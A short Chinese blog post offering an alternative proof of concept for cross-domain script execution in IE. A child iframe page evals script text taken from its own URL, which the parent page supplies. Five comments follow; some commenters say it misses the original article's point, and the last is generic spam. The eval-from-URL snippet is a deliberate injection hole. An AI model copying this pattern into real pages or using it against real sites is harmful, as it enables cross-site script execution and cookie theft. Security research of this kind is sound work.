《突破IE安全限制获取iframe子框架内的本地cookie》文的另一POC

刺在
http://hi.baidu.com/aullik5/blog/item/a41642357663b248251f141e.html
的文章:
《突破IE安全限制获取iframe子框架内的本地cookie》
的另一POC。

POC代码:

父页面在w1.kxlzx.com域。

XML/HTML代码
  1. <iframe id="kxlzx" src="http://w2.kxlzx.com/a.htm?script=alert(‘aaa’)" width="300" height="300" ></iframe>  

子页面在w2.kxlzx.com域

XML/HTML代码
  1. <script>  
  2.    try{  
  3.       eval((new String(parent.kxlzx.location)).substr((new String(parent.kxlzx.location)).indexOf  
  4.   
  5. ("script")+7,(new String(parent.kxlzx.location)).length));  
  6.   }catch(e){}  
  7. </script>  

子域接受父域过来的参数,然后执行JS。达到跨域。

发表评论?

5 条评论。

  1. 不一样的意思。(评论要七个字以上。)

  2. ………………不是这样的…

  3. 嗯。。。楼上说的对,文章没看完。。。
    突然有了这个想法。就写出来了。

  4. 。 最新tx mail 跨域。挖了吗?

  5. I’m curious to find out what blog platform you have been working with? I’m having some minor security problems with my latest website and I would like to find something more risk-free. Do you have any recommendations?

发表评论